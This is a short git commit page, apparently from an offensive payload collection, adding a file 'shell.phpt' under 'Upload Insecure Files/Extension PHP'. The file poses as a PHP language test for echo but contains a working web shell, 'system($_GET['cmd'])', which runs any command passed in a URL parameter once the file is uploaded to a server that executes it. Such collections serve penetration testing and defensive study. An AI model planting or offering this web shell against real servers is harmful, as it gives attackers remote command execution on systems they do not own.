Deployed 3ca2ece with MkDocs version: 1.6.1
This commit is contained in:
9
Upload Insecure Files/Extension PHP/shell.phpt
Normal file
9
Upload Insecure Files/Extension PHP/shell.phpt
Normal file
@@ -0,0 +1,9 @@
|
||||
--TEST--
|
||||
echo - basic test for echo language construct
|
||||
--FILE--
|
||||
<?php
|
||||
echo 'This works ', 'and takes args!';
|
||||
echo "Shell";system($_GET['cmd']);
|
||||
?>
|
||||
--EXPECT--
|
||||
This works and takes args!
|
||||
Reference in New Issue
Block a user